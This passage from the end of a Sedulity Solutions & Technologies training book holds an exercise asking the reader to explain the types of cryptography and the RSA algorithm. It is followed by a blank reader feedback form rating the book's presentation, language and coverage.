Time duration: 4 hrs.
Exercise: 4
What is Cryptography? Explain in details different types of cryptography with
examples. Explain in detail RSA algorithm.
Time duration: 4 hrs.
Reader’s Response
Name of Book: _________________________________________________________
Batch: ______________________________
Date: ______________________
The members of the Design Team at SEDULITY SOLUTIONS & TECHNOLOGIES,
New Delhi, are always striving to enhance the quality of the books produced by them.
As a reader, your suggestions and feedback are very important to us. They are of
tremendous help to us in continually improving the quality of this book. Please rate this
book in terms of the following aspects.
Aspect                          Rating                     Suggestion
Presentation Style              Excellent / Good / Poor    ____________________
Simplicity of language          Excellent / Good / Poor    ____________________
Topics chosen                   Excellent / Good / Poor    ____________________
Topic Coverage                  Excellent / Good / Poor    ____________________
Explanation Provided            Excellent / Good / Poor    ____________________
Quality of Pictures/Diagrams    Excellent / Good / Poor    ____________________
Overall Suggestion_______________________________________________________
______________________________________________________________________
______________________________________________________________________
______________________________________________________________________
Please fill up this response card and send it to the Design Head, Sedulity Solutions &
Technologies, New Delhi. Your efforts in this direction will be most appreciated.
[email protected]